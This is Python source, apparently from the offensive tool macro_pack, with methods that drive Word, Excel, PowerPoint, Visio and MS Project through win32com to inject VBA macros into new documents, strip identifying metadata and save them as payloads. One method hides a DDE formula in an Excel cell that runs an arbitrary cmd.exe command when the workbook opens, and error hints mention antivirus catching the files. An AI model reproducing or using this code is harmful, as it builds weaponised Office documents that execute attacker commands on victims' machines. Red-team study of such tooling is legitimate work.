def generate(self):
logging.info(" [+] Generating MSProject project...")
try:
self.enableVbom()
logging.info(" [-] Open MSProject project...")
# open up an instance of Word with the win32com driver
MSProject = win32com.client.Dispatch("MSProject.Application")
project = MSProject.Projects.Add()
# do the operation in background
MSProject.Visible = False
self.resetVBAEntryPoint()
logging.info(" [-] Inject VBA...")
# Read generated files
for vbaFile in self.getVBAFiles():
if vbaFile == self.getMainVBAFile():
with open (vbaFile, "r") as f:
# Add the main macro- into ThisProject part of Word project
ProjectModule = project.VBProject.VBComponents("ThisProject")
macro=f.read()
ProjectModule.CodeModule.AddFromString(macro)
else: # inject other vba files as modules
with open (vbaFile, "r") as f:
macro=f.read()
ProjectModule = project.VBProject.VBComponents.Add(1)
ProjectModule.Name = os.path.splitext(os.path.basename(vbaFile))[0]
ProjectModule.CodeModule.AddFromString(macro)
# Remove Informations
#logging.info(" [-] Remove hidden data and personal info...")
#project.RemoveFileProperties = 1
logging.info(" [-] Save MSProject project...")
pjMPP = 0 # The file was saved with the current version of Microsoft Office MSProject.
project.SaveAs(self.outputFilePath,Format = pjMPP)
# save the project and close
MSProject.FileClose ()
MSProject.Quit()
# garbage collection
del MSProject
self.disableVbom()
logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
logging.info(" [-] Test with : \n%s --run %s\n" % (getRunningApp(),self.outputFilePath))
except Exception:
logging.exception(" [!] Exception caught!")
logging.error(" [!] Hints: Check if MS Project is really closed and Antivirus did not catch the files")
logging.error(" [!] Attempt to force close MS Project applications...")
objProject = win32com.client.Dispatch("MSProject.Application")
objProject.Application.Quit()
# If it Application.Quit() was not enough we force kill the process
if utils.checkIfProcessRunning("winproj.exe"):
utils.forceProcessKill("winproj.exe")
del objProject
def generate(self):
logging.info(" [+] Generating MS PowerPoint document...")
try:
self.enableVbom()
# open up an instance of PowerPoint with the win32com driver
ppt = win32com.client.Dispatch("PowerPoint.Application")
logging.info(" [-] Open presentation...")
presentation = ppt.Presentations.Add(WithWindow = False)
self.resetVBAEntryPoint()
logging.info(" [-] Inject VBA...")
# Read generated files
for vbaFile in self.getVBAFiles():
# Inject all vba files as modules
with open (vbaFile, "r") as f:
macro=f.read()
pptModule = presentation.VBProject.VBComponents.Add(1)
pptModule.Name = os.path.splitext(os.path.basename(vbaFile))[0]
pptModule.CodeModule.AddFromString(macro)
# Remove Informations
logging.info(" [-] Remove hidden data and personal info...")
ppRDIAll=99
presentation.RemoveDocumentInformation(ppRDIAll)
logging.info(" [-] Save presentation...")
pptXMLFileFormatMap = {".pptm": 25, ".potm": 27}
if MSTypes.PPT == self.outputFileType:
presentation.SaveAs(self.outputFilePath, FileFormat=pptXMLFileFormatMap[self.outputFilePath[-5:]])
# save the presentation and close
ppt.Presentations(1).Close()
ppt.Quit()
# garbage collection
del ppt
self.disableVbom()
logging.info(" [-] Inject Custom UI...")
self._injectCustomUi()
logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
logging.info(" [-] Test with : \n%s --run %s\n" % (utils.getRunningApp(),self.outputFilePath))
except Exception:
logging.exception(" [!] Exception caught!")
logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
logging.error(" [!] Attempt to force close MS Powerpoint application...")
ppt = win32com.client.Dispatch("PowerPoint.Application")
ppt.Quit()
# If it Application.Quit() was not enough we force kill the process
if utils.checkIfProcessRunning("powerpnt.exe"):
utils.forceProcessKill("powerpnt.exe")
del ppt
def generate(self):
logging.info(" [+] Generating MS Visio document...")
try:
self.enableVbom()
logging.info(" [-] Open document...")
# open up an instance of Visio with the win32com driver
visio = win32com.client.Dispatch("Visio.InvisibleApp")
# do the operation in background without actually opening Visio
document = visio.Documents.Add("")
logging.info(" [-] Save document format...")
document.SaveAs(self.outputFilePath)
self.resetVBAEntryPoint()
logging.info(" [-] Inject VBA...")
# Read generated files
for vbaFile in self.getVBAFiles():
if vbaFile == self.getMainVBAFile():
with open (vbaFile, "r") as f:
macro=f.read()
visioModule = document.VBProject.VBComponents("ThisDocument")
visioModule.CodeModule.AddFromString(macro)
else: # inject other vba files as modules
with open (vbaFile, "r") as f:
macro=f.read()
visioModule = document.VBProject.VBComponents.Add(1)
visioModule.Name = os.path.splitext(os.path.basename(vbaFile))[0]
visioModule.CodeModule.AddFromString(macro)
# Remove Informations
logging.info(" [-] Remove hidden data and personal info...")
document.RemovePersonalInformation = True
# save the document and close
document.Save()
document.Close()
visio.Application.Quit()
# garbage collection
del visio
self.disableVbom()
logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
logging.info(" [-] Test with : \n%s --run %s\n" % (utils.getRunningApp(),self.outputFilePath))
except Exception:
logging.exception(" [!] Exception caught!")
logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
logging.error(" [!] Attempt to force close MS Visio applications...")
visio = win32com.client.Dispatch("Visio.InvisibleApp")
visio.Application.Quit()
# If it Application.Quit() was not enough we force kill the process
if utils.checkIfProcessRunning("visio.exe"):
utils.forceProcessKill("visio.exe")
def run(self):
logging.info(" [+] Generating MS Excel with DDE document...")
try:
# Get command line
paramDict = OrderedDict([("Cmd_Line", None)])
self.fillInputParams(paramDict)
command = paramDict["Cmd_Line"]
logging.info(" [-] Open document...")
# open up an instance of Excel with the win32com driver\ \\
excel = win32com.client.Dispatch("Excel.Application")
# do the operation in background without actually opening Excel
#excel.Visible = False
workbook = excel.Workbooks.Open(self.outputFilePath)
logging.info(" [-] Inject DDE field (Answer 'No' to popup)...")
ddeCmd = r"""=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c %s'!A1""" % command.rstrip(
)
excel.Cells(1, 26).Formula = ddeCmd
excel.Cells(1, 26).FormulaHidden = True
# Remove Informations
logging.info(" [-] Remove hidden data and personal info...")
xlRDIAll = 99
workbook.RemoveDocumentInformation(xlRDIAll)
logging.info(" [-] Save Document...")
excel.DisplayAlerts = False
excel.Workbooks(1).Close(SaveChanges=1)
excel.Application.Quit()
# garbage collection
del excel
logging.info(" [-] Generated %s file path: %s" %
(self.outputFileType, self.outputFilePath))
except Exception:
logging.exception(" [!] Exception caught!")
logging.error(
" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files"
)
logging.error(
" [!] Attempt to force close MS Excel applications...")
objExcel = win32com.client.Dispatch("Excel.Application")
objExcel.Application.Quit()
del objExcel
# If it Application.Quit() was not enough we force kill the process
if utils.checkIfProcessRunning("Excel.exe"):
utils.forceProcessKill("Excel.exe")
def check(self):
logging.info(" [-] Check feasibility...")
if utils.checkIfProcessRunning("powerpnt.exe"):
logging.error(" [!] Cannot generate PowerPoint payload if PowerPoint is already running.")
if utils.yesOrNo(" Do you want macro_pack to kill PowerPoint process? "):
utils.forceProcessKill("powerpnt.exe")
else:
return False
try:
ppt = win32com.client.Dispatch("PowerPoint.Application")
ppt.Quit()
del ppt
except:
logging.error(" [!] Cannot access PowerPoint.Application object. Is software installed on machine? Abort.")
return False
return True
def check(self):
logging.info(" [-] Check feasibility...")
if utils.checkIfProcessRunning("winproj.exe"):
logging.error(" [!] Cannot generate MS Project payload if Project is already running.")
if self.mpSession.forceYes or utils.yesOrNo(" Do you want macro_pack to kill Ms Project process? "):
utils.forceProcessKill("winproj.exe")
else:
return False
try:
objProject = win32com.client.Dispatch("MSProject.Application")
objProject.Application.Quit()
del objProject
except:
logging.error(" [!] Cannot access MSProject.Application object. Is software installed on machine? Abort.")
return False
return True
def check(self):
logging.info(" [-] Check feasibility...")
if utils.checkIfProcessRunning("visio.exe"):
logging.error(" [!] Cannot generate Visio payload if Visio is already running.")
if utils.yesOrNo(" Do you want macro_pack to kill Visio process? "):
utils.forceProcessKill("visio.exe")
else:
return False
# Check nb of source file
try:
objVisio = win32com.client.Dispatch("Visio.InvisibleApp")
objVisio.Application.Quit()
del objVisio
except:
logging.error(" [!] Cannot access Visio.InvisibleApp object. Is software installed on machine? Abort.")
return False
return True
def check(self):
logging.info(" [-] Check feasibility...")
if utils.checkIfProcessRunning("winword.exe"):
logging.error(
" [!] Cannot generate Word payload if Word is already running."
)
if utils.yesOrNo(" Do you want macro_pack to kill Word process? "):
utils.forceProcessKill("winword.exe")
else:
return False
try:
objWord = win32com.client.Dispatch("Word.Application")
objWord.Application.Quit()
del objWord
except:
logging.error(
" [!] Cannot access Word.Application object. Is software installed on machine? Abort."
)
return False
return True
def generate(self):
logging.info(" [+] Generating MS Excel document...")
try:
self.enableVbom()
# open up an instance of Excel with the win32com driver\ \\
excel = win32com.client.Dispatch("Excel.Application")
# do the operation in background without actually opening Excel
excel.Visible = False
# open the excel workbook from the specified file or create if file does not exist
logging.info(" [-] Open workbook...")
workbook = excel.Workbooks.Add()
self.resetVBAEntryPoint()
logging.info(" [-] Inject VBA...")
# Read generated files
for vbaFile in self.getVBAFiles():
logging.debug(" [,] Loading %s " % vbaFile)
if vbaFile == self.getMainVBAFile():
with open(vbaFile, "r") as f:
macro = f.read()
# Add the main macro- into ThisWorkbook part of excel file
excelModule = workbook.VBProject.VBComponents(
"ThisWorkbook")
excelModule.CodeModule.AddFromString(macro)
else: # inject other vba files as modules
with open(vbaFile, "r") as f:
macro = f.read()
excelModule = workbook.VBProject.VBComponents.Add(1)
excelModule.Name = os.path.splitext(
os.path.basename(vbaFile))[0]
excelModule.CodeModule.AddFromString(macro)
excel.DisplayAlerts = False
# Remove Informations
logging.info(" [-] Remove hidden data and personal info...")
xlRDIAll = 99
workbook.RemoveDocumentInformation(xlRDIAll)
logging.info(" [-] Save workbook...")
xlExcel8 = 56
xlXMLFileFormatMap = {".xlsx": 51, ".xlsm": 52, ".xltm": 53}
if self.outputFileType == MSTypes.XL97:
workbook.SaveAs(self.outputFilePath, FileFormat=xlExcel8)
elif MSTypes.XL == self.outputFileType:
workbook.SaveAs(
self.outputFilePath,
FileFormat=xlXMLFileFormatMap[self.outputFilePath[-5:]])
# save the workbook and close
excel.Workbooks(1).Close(SaveChanges=1)
excel.Application.Quit()
# garbage collection
del excel
self.disableVbom()
if self.mpSession.ddeMode: # DDE Attack mode
self.insertDDE()
logging.info(" [-] Generated %s file path: %s" %
(self.outputFileType, self.outputFilePath))
logging.info(" [-] Test with : \n%s --run %s\n" %
(utils.getRunningApp(), self.outputFilePath))
except Exception:
logging.exception(" [!] Exception caught!")
logging.error(
" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files"
)
logging.error(
" [!] Attempt to force close MS Excel applications...")
objExcel = win32com.client.Dispatch("Excel.Application")
objExcel.Application.Quit()
# If it Application.Quit() was not enough we force kill the process
if utils.checkIfProcessRunning("Excel.exe"):
utils.forceProcessKill("Excel.exe")
del objExcel
def generate(self):
logging.info(" [+] Generating MS Word document...")
try:
self.enableVbom()
logging.info(" [-] Open document...")
# open up an instance of Word with the win32com driver
word = win32com.client.Dispatch("Word.Application")
# do the operation in background without actually opening Excel
word.Visible = False
document = word.Documents.Add()
logging.info(" [-] Save document format...")
wdFormatDocument = 0
wdXMLFileFormatMap = {".docx": 12, ".docm": 13, ".dotm": 15}
if MSTypes.WD97 == self.outputFileType:
document.SaveAs(self.outputFilePath,
FileFormat=wdFormatDocument)
elif MSTypes.WD == self.outputFileType:
document.SaveAs(
self.outputFilePath,
FileFormat=wdXMLFileFormatMap[self.outputFilePath[-5:]])
self.resetVBAEntryPoint()
logging.info(" [-] Inject VBA...")
# Read generated files
for vbaFile in self.getVBAFiles():
logging.debug(" -> File %s" % vbaFile)
if vbaFile == self.getMainVBAFile():
with open(vbaFile, "r") as f:
# Add the main macro- into ThisDocument part of Word document
wordModule = document.VBProject.VBComponents(
"ThisDocument")
macro = f.read()
#logging.info(macro)
wordModule.CodeModule.AddFromString(macro)
else: # inject other vba files as modules
with open(vbaFile, "r") as f:
macro = f.read()
#logging.info(macro)
wordModule = document.VBProject.VBComponents.Add(1)
wordModule.Name = os.path.splitext(
os.path.basename(vbaFile))[0]
wordModule.CodeModule.AddFromString(macro)
document.Application.Options.Pagination = False
document.UndoClear()
document.Repaginate()
document.Application.ScreenUpdating = True
document.Application.ScreenRefresh()
#logging.info(" [-] Saving module %s..." % wordModule.Name)
document.Save()
#word.DisplayAlerts=False
# Remove Informations
logging.info(" [-] Remove hidden data and personal info...")
wdRDIAll = 99
document.RemoveDocumentInformation(wdRDIAll)
# save the document and close
document.Save()
document.Close()
word.Application.Quit()
# garbage collection
del word
self.disableVbom()
if self.mpSession.ddeMode: # DDE Attack mode
self.insertDDE()
logging.info(" [-] Generated %s file path: %s" %
(self.outputFileType, self.outputFilePath))
logging.info(" [-] Test with : \n%s --run %s\n" %
(utils.getRunningApp(), self.outputFilePath))
except Exception:
logging.exception(" [!] Exception caught!")
logging.error(
" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files"
)
logging.error(" [!] Attempt to force close MS Word...")
objWord = win32com.client.Dispatch("Word.Application")
objWord.Application.Quit()
# If it Application.Quit() was not enough we force kill the process
if utils.checkIfProcessRunning("winword.exe"):
utils.forceProcessKill("winword.exe")
del objWord
